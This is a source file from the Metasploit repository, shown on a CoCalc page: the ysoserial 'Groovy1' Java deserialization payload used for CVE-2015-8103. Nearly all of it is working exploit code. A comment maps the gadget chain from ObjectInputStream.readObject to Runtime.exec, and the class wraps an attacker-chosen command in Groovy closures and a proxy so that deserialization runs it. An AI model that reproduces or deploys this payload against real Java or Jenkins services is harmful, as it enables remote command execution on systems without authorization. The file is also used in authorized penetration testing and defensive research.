CoCalc -- Groovy1.java

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/exploits/CVE-2015-8103/payloads/Groovy1.java
¹⁹⁷¹⁵ views

1
package ysoserial.payloads;
2

3
import java.lang.reflect.InvocationHandler;
4
import java.util.Map;
5

6
import org.codehaus.groovy.runtime.ConvertedClosure;
7
import org.codehaus.groovy.runtime.MethodClosure;
8

9
import ysoserial.payloads.annotation.Dependencies;
10
import ysoserial.payloads.util.Gadgets;
11
import ysoserial.payloads.util.PayloadRunner;
12

13
/*
14
	Gadget chain:	
15
		ObjectInputStream.readObject()
16
			PriorityQueue.readObject()
17
				Comparator.compare() (Proxy)
18
					ConvertedClosure.invoke()
19
						MethodClosure.call()
20
							...
21
						  		Method.invoke()
22
									Runtime.exec()
23
	
24
	Requires:
25
		groovy
26
 */
27

28
@SuppressWarnings({ "rawtypes", "unchecked" })
29
@Dependencies({"org.codehaus.groovy:groovy:2.3.9"})
30
public class Groovy1 extends PayloadRunner implements ObjectPayload<InvocationHandler> {
31

32
	public InvocationHandler getObject(final String command) throws Exception {
33
		final ConvertedClosure closure = new ConvertedClosure(new MethodClosure(command, "execute"), "entrySet");
34
		
35
		final Map map = Gadgets.createProxy(closure, Map.class);		
36

37
		final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(map);
38
		
39
		return handler;
40
	}
41

42
	public static void main(final String[] args) throws Exception {
43
		PayloadRunner.run(Groovy1.class, args);
44
	}	
45
}
46

47

Product

Resources

Company